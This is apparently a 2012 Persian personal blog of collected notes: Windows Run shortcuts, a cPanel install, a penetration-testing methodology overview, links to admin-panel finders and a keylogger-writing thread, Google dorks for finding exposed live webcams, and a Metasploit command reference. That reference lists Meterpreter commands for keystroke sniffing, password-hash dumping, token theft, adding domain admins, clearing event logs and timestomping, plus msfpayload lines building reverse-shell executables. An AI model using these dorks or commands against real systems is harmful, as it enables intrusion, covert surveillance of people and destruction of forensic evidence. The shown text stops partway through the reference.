Monday, July 30, 2012



بدون شک استفاده از دستورات متنی به نسبت استفاده از ماوس نیازمند هوش و ذکاوت بیشتری است اما برای این کار نیازی نیست برنامه نویس و یا کاربر فوق‌حرفه‌ای باشید. تنها کافی است با زومیت همراه باشید تا با بهترین دستورات متنی ویندوز آشنا شوید تا امور روزمره خود را سریعتر از پیش انجام دهید.

در ویندوز 7 و ویندوز 8 بصورت پیش فرض خبری از Run نیست اما برای دسترسی سریع به آن می‌توانید از کلیدهای ترکیبی Winkey+R استفاده کنید (از روی کیبرد کلیدی که لوگوی ویندوز برروی آن است را نگه داشته و R را فشار دهید.) حال می‌توانید دستوراتی که در ادامه آمده را در همین جعبه Run وارد کنید.

شما می‌توانید برای دسترسی سریعتر به برنامه‌های مختلف از نام فایل اجرایی آنها استفاده کنید مثلا برای اجرای ماشین‌حساب در Run تایپ کنید Calc و یا برای دسترسی به نوت‌پد عبارت Notepad و برای ویرایش‌گر رجیستری، Regedit را وارد نمایید. اما ما در ادامه مقاله قصد داریم دستورات کاربردی‌ و جذاب‌تری را آموزش دهیم.

دسترسی سریع به پوشه حاوی فایل‌های موقت

اگر تا به حال به پوشه حاوی فایل‌های موقت خود سر نزده‌اید بدون شک با مراجعه و حذف فایل‌های درون آن چند گیگابایتی از فضای دیسک خود را آزاد کرده‌اید. برای دسترسی سریع به پوشه Temp عبارت زیر را در Run وارد نمایید:

%temp%

دسترسی سریع به پوشه Program Files

معمولا اکثر نرم‌افزارهای نصب شده برروی ویندوز در فولدر Program Files در درایو سیستم‌عامل ذخیره می‌شوند. اگر دوستان یا اقوام مبتدی‌تان برای رفع مشکلات کامپیوتر از شما کمک می‌گیرند این دستور می‌تواند به شما کمک شایانی کند. برای دسترسی به این پوشه می‌توانید از دستور زیر استفاده کنید:

%programfiles%

دسترسی سریع به پوشه پروفایل کاربر

همانند دو دستور قبل با دستور زیر به سرعت می‌توانید به پوشه حاوی اطلاعات کاربری که با آن لاگین کرده‌اید دسترسی داشته باشید. در این پوشه‌، فولدرهای عکس، موزیک، ویدیو و دیگر اطلاعات شخصی شما وجود دارند.

%userprofile%

دسترسی سریع به کنترل پنل

برای دسترسی سریع به کنترل پنل همواره می‌توانید عبارت Control را در CMD یا Run وارد کنید.

دسترسی سریع به Disk Cleanup

به کمک ابزار داخلی Disk Cleanup ویندوز، می‌توانید از شر فایل‌های اضافی و موقت خلاص شده و فضای خالی دیسک سخت خود را آزاد کنید. برای دسترسی آسان به آن نیز از دستور زیر استفاده نمایید:

cleanmgr

دسترسی سریع به بخش مدیریت کامپیوتر

در بخش Computer Management می‌توانید فولدرهای به‌اشتراک گذاشته شده را کنترل کنید و یا کاربران سیستم و دیسک سخت و غیره را مدیریت کنید. برای دسترسی سریع به این قسمت می‌توانید در ویندوز اکس‌پی برروی My Computer و یا در ویندوز 7 بر روی Computer راست کلیک نموده و Manage را انتخاب کنید اما راه دیگر وارد نمودن دستور زیر در Run است:

compmgmt.msc

دسترسی سریع به تنظیمات فایروال

تمایل دارید فایروال ویندوز را فعال یا غیرفعال کنید و یا یک دسترسی به یک پورت خاص را محدود کنید؟ از دستور زیر استفاده نمایید:

Firewall.cpl

دسترسی سریع به پوشه‌های اشتراک گذاشته شده

برای دسترسی سریع به فولدرهای اشتراک گذاشته شده می‌توانید از دستور زیر استفاده نماید:

Fsmgmt.msc

مرورصفحات وب در مرورگرهای مختلف

برای اجرای مرورگرهای مختلف می‌توانید نام آنها (iexplore, chrome, firefox, opera) را در Run وارد نمایید البته به شرطی که آنها را برروی سیستم خود نصب کرده باشید! اما کار به اینجا ختم نمی‌شود شما می‌توانید علاوه بر باز کردن مرورگرها با اضافه کردن نام وب سایت مورد نظر خود در جلوی اسم مرورگر، آن صفحه خاص را باز کنید. به عنوان مثال با وارد کردن دستور زیر در Run می‌توانید نت گارد را در مرورگر اینترنت اکسپلور باز نمایید:

iexplore www.netqurd.com

مشاهده کلیه اطلاعات مربوط به سیستم

System Information ابزار داخلی ویندوز است که از طریق آن می‌توانید به مشخصات سخت‌افزاری و نرم افزاری کامپیوتر خود دسترسی داشته باشید برای اجرای سریع این ابزار می‌توانید از دستور زیر استفاده نمایید:

msinfo32

اضافه و یا حذف سریع کاربر

User Account یکی از ابزارهای جالب ویندوز برای مدیریت کاربران بشکل حرفه‌ای است، از طریق این ابزار می‌توانید دسترسی کاربران مختلف را تعیین کنید و یا کاربر جدید اضافه و کم نمایید. برای دسترسی سریع به این ابزار از دستور زیر استفاده کنید:

Netplwiz

اجرای کی‌برد مجازی

ویندوز دارای یک کی‌برد مجازی با نام Onscreen Keyboard است که برای ورود اطلاعات مهم مانند رمز حساب بانکی استفاده می‌شود. اگر ویروسی نبودن یا وجود Keyloggerها (برنامه‌های مخربی که حروف‌ تایپ‌شده با کی‌برد را ذخیره نموده و برای افراد دیگر ارسال می‌کنند) در کامپیوتر خود مطمئن نیستید می‌توانید از این صفحه‌کلید استفاده نمایید. علاوه بر این اگر کی‌برد لپ‌تاپ یا کامپیوتر شما خراب شده می‌توانید صفحه کلید مجازی را اجرا کنید. برای فعال کردن آن نیز می‌توانید عبارت زیر را در Run یا CMD وارد کنید:

Osk

خروج و یا خاموش کردن کامپیوتر

برای خاموش کردن کامپیوتر می‌توانید از دستور shutdown و برای لاگ‌آف کردن نیز از دستور logoff استفاده کنید. اگر از دستور Shutdown استفاده کردید و چند لحظه بعد از کرده خود پشیمان شدید می‌توانید با دستور زیر عملیات خاموش شدن سیستم را متوقف کنید:

Shutdown –a

اجرای سریع مدیریت ابزارهای کاربردی

Utility Manager مجموعه‌ای از ابزارهای ویندوزی است که کار را برای کاربر آسان می‌کند در این قسمت شما می‌توانید به همان کی‌برد مجازی به همراه، ابزار بزرگنمایی تصویر و یا گوینده صوتی ویندوز دسترسی داشته باشید. برای دسترسی سریع به این بخش از دستور زیر استفاده نمایید:

Utilman

دسترسی سریع به نرم‌افزار ویراستار

حتما با نوت‌پد ویندوز که با دستور notepad اجرا می‌شود آشنا هستید اما به ویرایشگر قوی‌تر داخلی ویندوز یعنی Wordpad نیاز دارید می‌توانید آن را با دستور زیر اجرا کنید:

Write

Sunday, July 29, 2012

ADMIN FINDER

http://scan.subhashdasyam.com/admin-panel-finder.php

http://www.th3-zo0mbie.com/tools/admin-finder.php

http://y-shahinzadeh.ir/af/

Sunday, July 22, 2012

برای نصب سی پانل نخست از برنامه Putty وارد SSH شوید و دستورات زیر رو وارد کنید تا مرحله نصب آغاز شود:

mkdir /home/cpins

cd /home/cpins

wget http://layer1.cpanel.net/latest

sh latest

بعد از دستور چهارم بین 20 تا 80 دقیقه (ممکن است بیشتر هم شود بسته به نوع سخت افزار سرور مجازی و یا اختصاصی) یکسری نشانه مثل ++++++ **---- میاد و میره و در نهایت تمام میشه.

بعد از اتمام به این روش وارد کنترل پانل شوید:

https://yourserverip:2087

توجه: به جای YourServerIP هم آدرس آی پی سرور خودتون را باید بزنید.

بعدموقع نصب میرسه که چه گزینه هایی رو انتخاب کنید تا تنظیمات تمام بشه.

این گزینه ها شخصی است . توی گزینه ها صفحه اول قبول قوانین است صفحه های بعدی هم مربوط به وارد کردن DNS سرور انتخاب سیستم وب میل و .... است که اینا شخصی است تنظیماتش و خودتون باید انتخاب کنید.

Wednesday, July 18, 2012

keylog nevisi

http://ashiyane.org/forums/showthread.php?p=387224&posted=1#post387224

Sunday, July 15, 2012

NETQURD

آموزش کامل تنظیمات فایروال (Firewall ) در ویندوز

http://www.netqurd.com/books/windows/768-%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%DA%A9%D8%A7%D9%85%D9%84-%D8%AA%D9%86%D8%B8%DB%8C%D9%85%D8%A7%D8%AA-%D9%81%D8%A7%DB%8C%D8%B1%D9%88%D8%A7%D9%84-%28Firewall-%29-%D8%AF%D8%B1-%D9%88%DB%8C%D9%86%D8%AF%D9%88%D8%B2-7.html

حملات MITM (آلودگی حافظه نهان ARP) – قسمت اول


http://www.netqurd.com/books/network/1260-%D8%AD%D9%85%D9%84%D8%A7%D8%AA-Man-in-the-Middle-%28%D8%A2%D9%84%D9%88%D8%AF%DA%AF%DB%8C-%D8%AD%D8%A7%D9%81%D8%B8%D9%87-%D9%86%D9%87%D8%A7%D9%86-ARP%29-%E2%80%93-%D9%82%D8%B3%D9%85%D8%AA-%D8%A7%D9%88%D9%84.html

پیش نیاز اجرای تست نفوذ
هر شركت یا سازمان، پیش از اجرای تست نفوذ، به یك سیاست امنیتی كامپیوتر نیاز دارد. سیاست امنیتی، یك آئین نامه رسمی از قوانینی است كه باید توسط افرادی كه دسترسی به دارایی های اطلاعاتی و فناوری یك شركت یا سازمان دارند، رعایت شوند. تدوین سیاست امنیتی باید با توجه به ارزش دارایی ها و منابع اطلاعاتی شركت انجام شده و سپس رویه های امنیتی مناسب با آنها ایجاد شوند. فاكتور اصلی در تعیین رویه ها و كنش های امنیتی مناسب در سیاست امنیتی كامپیوتر، هزینه ای است كه شركت در صورت از دست دادن داده ها متحمل می شود. برای مثال، در صورتی كه شركتی با اطلاعات دولتی و یا مالی سر و كار داشته باشد، روند غیر فعال كردن یك حساب كاربری (User ID) در آن، متفاوت از یك دانشكده خواهد بود. به علاوه اگر شركتی دارای اطلاعات خصوصی، اسرار تجاری و یا لیست مشتریانی است كه رقبا نباید از آن اطلاع حاصل كنند، لازم است ارزش امنیتی بالاتری را برای اطلاعات مذكور قائل شده و گام های امنیتی مناسب برای حفاظت از آنها برداشته شود.
یك سیاست امنیتی كامپیوتر باید موارد زیر را پوشش دهد:


  •     اتصالات از/به اینترنت
  •     اتصالات از طریق خط تلفن (dial-up)
  •     امنیت دسترسی فیزیكی
  •     مدیریت كلمه عبور
  •     مسئولیت ها و حقوق كاربران
  •     مسئولیت ها و حقوق مدیران
  •     محافظت از اطلاعات حساس
  •     روال های پاسخگویی به فوریت ها
  •     مستند سازی
  •     پشتیبان گیری از اطلاعات
  •     گزارش ها و ثبت وقایع (logs)
  •     رسیدگی به رخدادها
  •     چگونگی گزارش یك مشكل یا رخداد امنیتی
  •     تخلفاتی كه باید گزارش شوند
  •     اجرای سیاست
  •     مسئول نهایی


برنامه ریزی تست نفوذ
قبل از اجرای تست نفوذ لازم است برای آن برنامه ریزی شده و میزان آزادی عمل تست و قلمروی آن دقیقاً معین شود. همچنین در این مرحله در مورد اجرای تست به شیوه جعبه سفید و یا جعبه سیاه تصمیم گیری صورت می گیرد، اعضای تیم مشخص می گردند، معیارهای موفقیت تست تعریف می شوند و مجوز مدیریت دریافت می گردد. در این مرحله با توجه به حوزه تست نفوذ، پارامترهای ضروری برای تشخیص آسیب پذیری ها تعیین می گردد. مواردی كه در زمینه برنامه ریزی تست نفوذ باید مورد توجه قرار گیرند عبارتند از:
  • مدت زمان انجام تست چقدر است؟
  • چه كسانی از انجام تست اطلاع دارند؟
  • چه كسی تأیید كننده دسترسی غیر مجاز است؟
  • چه منابع و سیستم هایی و چگونه تست شوند ؟
    • تنظیمات فایروال
      • اطلاعات كامل
      • بدون اطلاعات
    • سیستم های میزبان
      • وب سرورها
      • انتخاب كلمات عبور
      • چگونگی به اشتراك گذاری
      • سرورهای FTP
      • سیستم تشخیص نفوذ
    • سرورهای DNS
    • مودم ها Dial in
    • دسترسی های بی سیم
    • Public Branch Exchange)PBX)
    • غیر فعال سازی UserID و یا روند خارج شدن یك كارمند از سیستم
    • دسترسی های فیزیكی
    • مهندسی اجتماعی
    • كامپیوترهای رومیزی
      • انتخاب كلمات عبور
      • تنظیمات مودم ها برای پاسخگویی اتوماتیك و یا دسترسی به نرم افزارهای خارجی
  • چگونگی ارائه نتایج
  • بعد از چه مدت زمانی، تست دیگری برای اطمینان از نتایج تغییرات انجام می شود؟


جمع آوری اطلاعات (شناسایی)
پس از تعیین قلمروی تست نفوذ، نوبت به جمع آوری اطلاعات درباره شركت هدف تست می رسد. تست نفوذ معمولاً با سه مرحله پیش تست آغاز می شود. footprinting، scanning و enumerating. این سه مرحله پیش تست بسیار مهم هستند زیرا تفاوت بین یك تست موفق كه تصویری كامل از شبكه هدف را فراهم می سازد و یك تست ناموفق كه این كار را انجام نمی دهد، از این سه مرحله ناشی می شود. این سه با یكدیگر به عنوان گام شناسایی یا reconnaissance شناخته می شوند. در این گام سعی می شود تا حد امكان اطلاعات در مورد شبكه هدف جمع آوری گردد و شامل هفت زیر مرحله می شود:
1.    جمع آوری اطلاعات اولیه
2.    مشخص كردن دامنه آدرس های IP شبكه
3.    شناسایی رایانه های فعال
4.    كشف پورت های باز و نقاط دسترسی
5.    شناسایی سیستم عامل
6.    شناسایی سرویس های ارائه شده در هر پورت
7.    نگاشت شبكه

در زیر در مورد هر كدام از گام های پیش تست بیشتر توضیح می دهیم:


Footprinting
در این مرحله دو گام اول مرحله شناسایی یعنی جمع آوری اطلاعات اولیه و مشخص كردن دامنه آدرس های IP شبكه هدف صورت انفعالی انجام می پذیرد. این مرحله بسیار مهم است زیرا هكرها می توانند اطلاعات به دست آمده در این مرحله را بدون آگاهی سازمان هدف جمع آوری كنند. در این زمینه تعدادی منابع و ابزار رایگان و تجاری وجود دارند كه می توانند در به دست آوردن اطلاعات اولیه كمك خوبی باشند. دسترسی به بعضی از این منابع مانند خبرنامه های شركت بسیار آسان است. تست كنندگان با استفاده از این منبع به اطلاعات مفیدی دست پیدا می كنند كه كارمندان حتی بدون آنكه متوجه باشند آنها را بروز می دهند. دیگر روش ها برای جمع آوری اطلاعات استفاده از Whois، Nslookup، Smart Whois و SamSpade است. برای مثال Whois با استفاده از سرویس های دایركتوری، اطلاعاتی را در مورد دامنه ها و ثبت كنندگان آنها در اختیار می گذارد و Nslookup یك پرس و جوی تعاملی را با سرورهای نام دامنه انجام می دهد.


Scanning
چهار مرحله بعدی گام شناسایی (شناسایی رایانه های فعال، كشف پورت های باز و نقاط دسترسی، شناسایی سیستم عامل و شناسایی سرویس های ارائه شده در هر پورت) به عنوان بخشی از مرحله پویش یا Scanning در نظر گرفته می شوند. در این مرحله هدف جمع آوری اطلاعات در مورد پورت های باز، پویش برنامه های كاربردی، ping كردن دستگاه ها، مشخص كردن حدود شبكه و پویش پورت های هر دستگاه به تنهایی است. این مرحله نسبت به footprinting پویاتر بوده و اطلاعات جزئی تری از هدف جمع آوری می شود. مانند مرحله قبل برخی ابزارها در این مرحله یاری رسانند مانند NMap، ping، Telnet ،Traceroute، SuperScan، Netcat، NeoTrace و Visual Route. برای مثال با استفاده از Ping می توان یك تقاضای ICMP ECHO را به یك میزبان شبكه مشخص ارسال كرد. در دستور ping می توان یك پورت را نیز تعیین كرد كه دریافت پاسخ، نشان دهنده باز بودن پورت مذكور برای ارتباط TCP/IP است. همچنین با استفاده از Telnet می توان یك ارتباط تعاملی را با یك میزبان مشخص برقرار كرده و یك پورت را در این دستور وارد كرد. دریافت پاسخ نشان دهنده باز بودن پورت مذكور برای ارتباط TCP/IP است. Traceroute ابزار دیگری است كه مسیرهای ارتباطی اینترنت را بین دو سیستمی كه ارتباط TCP/IP دارند، مشخص می سازد.


Enumerating
آخرین مرحله گام شناسایی نگاشت شبكه است كه با استفاده از اطلاعات Scanning انجام شده و مرحله Enumerating را تشكیل می دهد. در این مرحله هدف طراحی یك تصویر نسبتاً كامل از شبكه هدف است. در این مرحله اطلاعات نام كاربران و گروه ها، منابع شبكه به اشتراك گذاشته شده و برنامه های كاربردی جمع آوری می گردد. مخصوصاً اطلاعات مربوط به سیستم عامل مورد استفاده (همراه با نسخه آن) و برنامه های كاربردی نصب شده و نسخه آنها اطلاعات باارزشی در این زمینه محسوب می شوند. با دانستن نوع سیستم عامل و برنامه های كاربردی می توان از آسیب پذیری های شناخته شده موجود در آنها جهت پیاده سازی نفوذ استفاده كرد. در این مرحله می توان از تكنیك های زیر استفاده كرد:
  •     به دست آوردن اطلاعات Active Directory و شناسایی كاربران آسیب پذیر
  •     شناسایی NetBIOS با استفاده از Nbscan
  •     استفاده از SNMPutil برای SNMP
  •     به كارگیری پرس و جوهای DNS
  •     ایجاد ارتباطات و نشست هایnull

هر كدام از ابزارها و تكنیك های فوق می توانند در مورد ارتباطات شبكه و یا سیستم میزبان نیز اطلاعات بیشتری را در اختیار بگذارند. در این مرحله از تست كه اولین مرحله است، توصیه به جمع آوری هر چه بیشتر اطلاعات می شود. اطلاعات مذكور از طرفی انتخاب تست های قابل انجام را راحت تر می كنند و از طرف دیگر تست را بیشتر به شبیه سازی یك نفوذ واقعی هدایت می كنند. هكرهای واقعی قبل از انجام حمله تا جایی كه می توانند به مطالعه و تحقیق در مورد سیستم مورد حمله می پردازند و لذا یك انجام دهنده تست نفوذ نیز بایستی با اطلاعاتی مشابه یك هكر واقعی به انجام تست بپردازد. هر چقدر اطلاعات كمتری توسط ابزارهای فوق به دست آید، نشان دهنده امنیت بالاتر سیستم است.


به كارگیری آسیب پذیری ها با هدف نفوذ
در مرحله سوم تست نفوذ، برای شناسایی مشكلات مربوط به تنظیمات سیستم، از ابزارهای پویش كردن آسیب پذیری ها و Password Crackers استفاده می شود. برخی از ابزارهای قابل استفاده در این زمینه عبارتند از:

Nessus – ابزاری برای تشخیص آسیب پذیری ها در سیستم های Unix

SARA – دومین نسل از ابزار پویش آسیب پذیری SATAN

Whisker – ابزار پویش آسیب پذیری در CGI

Hping2 – یك ابزار شبكه است كه می تواند بسته های دلخواه ICMP، UDP و TCP را ارسال كند و برای آزمودن قوانین فایروال و بررسی قطعات (fragments) بسته ها استفاده می شود.

Firewalk - یك ابزار شبیه دنبال كننده های مسیر است كه اجازه دسترسی به Access Control List یك فایروال را می دهد و همچنین امكان در آوردن نقشه شبكه را نیز فراهم می كند.

(NAT(NetBIOS Auditing tool – یك ابزار برای مشخص كردن آسیب پذیری ها در تنظیمات NetBIOS یك سیستم NT است.

Toneloc – ابزاری برای بررسی مودم سیستم های رومیزی است كه برای جواب دهی اتوماتیك و یا اجرای نرم افزار از راه دور به كار می روند.

برخی ابزارهای تجاری نیز در این زمینه وجود دارند كه عبارتند از:

(Internet Security Server (ISS – این محصول بسیار پر كاربرد است و بسیاری از شركت های انجام دهنده تست نفوذ از آن برای شناسایی آسیب پذیری ها استفاده می كنند.

CyberCop – این ابزار نیز برای پویش آسیب پذیری ها به كار می رود.

Phonesweep - ابزاری برای بررسی مودم سیستم های رومیزی است كه برای جواب دهی اتوماتیك و یا اجرای نرم افزار از راه دور به كار می روند.

به غیر از موارد ذكر شده در بالا ابزارهایی نیز برای تشخیص نفوذ و مدیریت داده های تولید شده در روند تشخیص نفوذ وجود دارند. البته مبحث تشخیص نفوذ با اینكه مرتبط با تست نفوذ است ولی نیازمند بررسی جداگانه و مفصلی است و لذا از آوردن ابزارهای مرتبط با آن خودداری كرده ایم.

بعد از انتخاب ابزارهای ارزیابی آسیب پذیری، باید از آنها بر روی سیستم ها و شبكه استفاده كرد. اطلاعاتی كه از ابزارهای فوق به دست می آید، به روشنی آسیب پذیری های اصلی را مشخص می كنند. در این مرحله لازم است با توجه به نوع نفوذ، كاری انجام داد تا وجود آسیب پذیری را به اثبات رساند. برای مثال باید فایلی را در منطقه كنترل شده قرار داد و یا كلمه عبور مربوط به نام كاربری مهمان را تغییر داد. همچنین در موارد دسترسی های فیزیكی باید بخشی از پرونده ای را برداشت و یا در شبیه سازی حملات مهندسی اجتماعی می توان به شماره تلفن منزل مدیر سیستم دسترسی پیدا كرد.
در این مرحله برخی از حملات مانند حملات تزریق SQL، XSS، سرریز بافر و تروجان ها نیز بر روی شبكه شبیه سازی می شوند.


پاكسازی
در این مرحله تمام فایل هایی كه در حین تست نفوذ انجام شده اند پاك شده و تمام تنظیمات و یا پارامترهایی كه تغییر یافته اند به حالت اولیه باز می گردند. همچنین تمام ردپاها پاك شده و تمام سیستم هایی كه به آنها نفوذ شده است به حالت پیش از تست نفوذ بر می گردند.
dork bara webcam



"inurl:/view.index.shtml"


 inurl:/view.shtml
    intitle:”Live View / - AXIS” | inurl:view/view.shtml^
    inurl:ViewerFrame?Mode=
    inurl:ViewerFrame?Mode=Refresh
    inurl:axis-cgi/jpg
    inurl:axis-cgi/mjpg (motion-JPEG)
    inurl:view/indexFrame.shtml
    inurl:view/index.shtml
    inurl:view/view.shtml
    liveapplet
    intitle:”live view” intitle:axis
    intitle:liveapplet
    allintitle:”Network Camera NetworkCamera”
    intitle:axis intitle:”video server”
    intitle:liveapplet inurl:LvAppl
    intitle:”EvoCam” inurl:”webcam.html”
    intitle:”Live NetSnap Cam-Server feed”
    intitle:”Live View / - AXIS”
    intitle:”Live View / - AXIS 206M”
    intitle:”Live View / - AXIS 206W”
    intitle:”Live View / - AXIS 210″
    inurl:indexFrame.shtml Axis
    inurl:”MultiCameraFrame?Mode=Motion”
    intitle:start inurl:cgistart
    intitle:”WJ-NT104 Main Page”
    intext:”MOBOTIX M1″ intext:”Open Menu”
    intext:”MOBOTIX M10″ intext:”Open Menu”
    intext:”MOBOTIX D10″ intext:”Open Menu”
    intitle:snc-z20 inurl:home/
    intitle:snc-cs3 inurl:home/
    intitle:snc-rz30 inurl:home/
    intitle:”sony network camera snc-p1″
    intitle:”sony network camera snc-m1″
    site:.viewnetcam.com -www.viewnetcam.com
    intitle:”Toshiba Network Camera” user login
    intitle:”netcam live image”
    intitle:”i-Catcher Console - Web Monitor”

Saturday, July 14, 2012

dastorat va yek nemone bypass

http://iranhack.org/acc/thread-383-post-770.html#pid770

Thursday, July 12, 2012

REFRENCE   METASPOIT
  1. This is a reference for the most frequently used commands and syntax within Metasploit’s various interfaces and utilities.

  2. MSFconsole Commands:

  3. Select All
  4. Code:
  5. show exploits
  6. Show all exploits within the Framework.

  7. Select All
  8. Code:
  9. show payloads
  10. Show all payloads within the Framework.

  11. Select All
  12. Code:
  13. show auxiliary
  14. Show all auxiliary modules within the Framework.


  15. Select All
  16. Code:
  17. search name
  18. Search for exploits or modules within the Framework.

  19. Select All
  20. Code:
  21. info
  22. Load information about a specific exploit or module.

  23. Select All
  24. Code:
  25. use name
  26. Load an exploit or module (example: use windows/smb/psexec).

  27. Select All
  28. Code:
  29. LHOST
  30. Your local host’s IP address reachable by the target, often the public IP address when not on a local network. Typically used for reverse shells.

  31. Select All
  32. Code:
  33. RHOST
  34. The remote host or the target.

  35. Select All
  36. Code:
  37. set function
  38. Set a specific value (for example, LHOST or RHOST).

  39. Select All
  40. Code:
  41. setg function
  42. Set a specific value globally (for example, LHOST or RHOST).

  43. Select All
  44. Code:
  45. show options
  46. Show the options available for a module or exploit.

  47. Select All
  48. Code:
  49. show targets
  50. Show the platforms supported by the exploit.

  51. Select All
  52. Code:
  53. set target num
  54. Specify a specific target index if you know the OS and service pack.

  55. Select All
  56. Code:
  57. set payload payload
  58. Specify the payload to use.

  59. Select All
  60. Code:
  61. show advanced
  62. Show advanced options.

  63. Select All
  64. Code:
  65. set autorunscript migrate -f
  66. Automatically migrate to a separate process upon exploit completion.

  67. Select All
  68. Code:
  69. check
  70. Determine whether a target is vulnerable to an attack.

  71. Select All
  72. Code:
  73. exploit
  74. Execute the module or exploit and attack the target.exploit -j
  75. Run the exploit under the context of the job. (This will run the exploit in the background.)

  76. Select All
  77. Code:
  78. exploit -z
  79. Do not interact with the session after successful exploitation.

  80. Select All
  81. Code:
  82. exploit -e encoder
  83. Specify the payload encoder to use (example: exploit –e shikata_ga_nai).

  84. Select All
  85. Code:
  86. exploit -h
  87. Display help for the exploit command.

  88. Select All
  89. Code:
  90. sessions -l
  91. List available sessions (used when handling multiple shells).

  92. Select All
  93. Code:
  94. sessions -l -v
  95. List all available sessions and show verbose fields, such as which vulnerability was used when exploiting the system.

  96. Select All
  97. Code:
  98. sessions -s script
  99. Run a specific Meterpreter script on all Meterpreter live sessions.

  100. Select All
  101. Code:
  102. sessions -K
  103. Kill all live sessions.

  104. Select All
  105. Code:
  106. sessions -c cmd
  107. Execute a command on all live Meterpreter sessions.

  108. Select All
  109. Code:
  110. sessions -u sessionID
  111. Upgrade a normal Win32 shell to a Meterpreter console.

  112. Select All
  113. Code:
  114. db_create name
  115. Create a database to use with database-driven attacks (example: db_create autopwn).

  116. Select All
  117. Code:
  118. db_connect name
  119. Create and connect to a database for driven attacks (example: db_connect autopwn).

  120. Select All
  121. Code:
  122. db_nmap
  123. Use nmap and place results in database. (Normal nmap syntax is supported, such as –sT –v –P0.)

  124. Select All
  125. Code:
  126. db_autopwn -h
  127. Display help for using db_autopwn.

  128. Select All
  129. Code:
  130. db_autopwn -p -r -e
  131. Run db_autopwn against all ports found, use a reverse shell, and exploit all systems.

  132. Select All
  133. Code:
  134. db_destroy
  135. Delete the current database.

  136. Select All
  137. Code:
  138. db_destroy user:password@host:port/database
  139. Delete database using advanced options.

  140. Meterpreter Commands help:
  141. Open Meterpreter usage help.

  142. Select All
  143. Code:
  144. run scriptname
  145. Run Meterpreter-based scripts; for a full list check the scripts/meterpreter directory.

  146. Select All
  147. Code:
  148. sysinfo
  149. Show the system information on the compromised target.

  150. Select All
  151. Code:
  152. ls
  153. List the files and folders on the target.

  154. Select All
  155. Code:
  156. use priv
  157. Load the privilege extension for extended Meterpreter libraries.

  158. Select All
  159. Code:
  160. ps
  161. Show all running processes and which accounts are associated with each process.

  162. Select All
  163. Code:
  164. migrate PID
  165. Migrate to the specific process ID (PID is the target process ID gained from the ps command).

  166. Select All
  167. Code:
  168. use incognito
  169. Load incognito functions. (Used for token stealing and impersonation on a target machine.)

  170. Select All
  171. Code:
  172. list_tokens -u
  173. List available tokens on the target by user.

  174. Select All
  175. Code:
  176. list_tokens -g
  177. List available tokens on the target by group.

  178. Select All
  179. Code:
  180. impersonate_token DOMAIN_NAME\\USERNAME
  181. Impersonate a token available on the target.

  182. Select All
  183. Code:
  184. steal_token PID
  185. Steal the tokens available for a given process and impersonate that token.drop_token Stop impersonating the current token.

  186. Select All
  187. Code:
  188. getsystem
  189. Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors.

  190. Select All
  191. Code:
  192. shell
  193. Drop into an interactive shell with all available tokens.

  194. Select All
  195. Code:
  196. execute -f cmd.exe -i
  197. Execute cmd.exe and interact with it.

  198. Select All
  199. Code:
  200. execute -f cmd.exe -i -t
  201. Execute cmd.exe with all available tokens.

  202. Select All
  203. Code:
  204. execute -f cmd.exe -i -H -t
  205. Execute cmd.exe with all available tokens and make it a hidden process.

  206. Select All
  207. Code:
  208. rev2self
  209. Revert back to the original user you used to compromise the target.

  210. Select All
  211. Code:
  212. reg command
  213. Interact, create, delete, query, set, and much more in the target’s registry.

  214. Select All
  215. Code:
  216. setdesktop number
  217. Switch to a different screen based on who is logged in.

  218. Select All
  219. Code:
  220. screenshot
  221. Take a screenshot of the target’s screen.

  222. Select All
  223. Code:
  224. upload file
  225. Upload a file to the target.

  226. Select All
  227. Code:
  228. download file
  229. Download a file from the target.

  230. Select All
  231. Code:
  232. keyscan_start
  233. Start sniffing keystrokes on the remote target.

  234. Select All
  235. Code:
  236. keyscan_dump
  237. Dump the remote keys captured on the target.

  238. Select All
  239. Code:
  240. keyscan_stop
  241. Stop sniffing keystrokes on the remote target.

  242. Select All
  243. Code:
  244. getprivs
  245. Get as many privileges as possible on the target.

  246. Select All
  247. Code:
  248. uictl enable keyboard/mouse
  249. Take control of the keyboard and/or mouse.

  250. Select All
  251. Code:
  252. background
  253. Run your current Meterpreter shell in the background.

  254. Select All
  255. Code:
  256. hashdump
  257. Dump all hashes on the target.

  258. Select All
  259. Code:
  260. use sniffer
  261. Load the sniffer module.

  262. Select All
  263. Code:
  264. sniffer_interfaces
  265. List the available interfaces on the target.

  266. Select All
  267. Code:
  268. sniffer_dump interfaceID pcapname
  269. Start sniffing on the remote target.

  270. Select All
  271. Code:
  272. sniffer_start interfaceID packet-buffer
  273. Start sniffing with a specific range for a packet buffer.

  274. Select All
  275. Code:
  276. sniffer_stats interfaceID
  277. Grab statistical information from the interface you are sniffing.

  278. Select All
  279. Code:
  280. sniffer_stop interfaceID
  281. Stop the sniffer.

  282. Select All
  283. Code:
  284. add_user username password -h ip
  285. Add a user on the remote target.

  286. Select All
  287. Code:
  288. add_group_user "Domain Admins" username -h ip
  289. Add a username to the Domain Administrators group on the remote target.

  290. Select All
  291. Code:
  292. clearev
  293. Clear the event log on the target machine.

  294. Select All
  295. Code:
  296. timestomp
  297. Change file attributes, such as creation date (antiforensics measure).

  298. Select All
  299. Code:
  300. reboot
  301. Reboot the target machine.

  302. MSFpayload Commands:

  303. Select All
  304. Code:
  305. msfpayload -h
  306. List available payloads.

  307. Select All
  308. Code:
  309. msfpayload windows/meterpreter/bind_tcp O
  310. List available options for the windows/meterpreter/bind_tcp payload (all of these can use any payload).

  311. Select All
  312. Code:
  313. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 X > payload.exe
  314. Create a Meterpreter reverse_tcp payload to connect back to 192.168.1.5 and on port 443, and then save it as a Windows Portable Executable named payload.exe.

  315. Select All
  316. Code:
  317. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R > payload.raw
  318. Same as above, but export as raw format. This will be used later in msfencode

  319. Select All
  320. Code:
  321. msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c
  322. Same as above but export as C-formatted shellcode.

  323. Select All
  324. Code:
  325. msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java
  326. Export as %u encoded JavaScript.

  327. MSFencode Commands:

  328. Select All
  329. Code:
  330. msfencode -h
  331. Display the msfencode help.

  332. Select All
  333. Code:
  334. msfencode -l
  335. List the available encoders.

  336. Select All
  337. Code:
  338. msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war, macho)
  339. Format to display the encoded buffer.

  340. Select All
  341. Code:
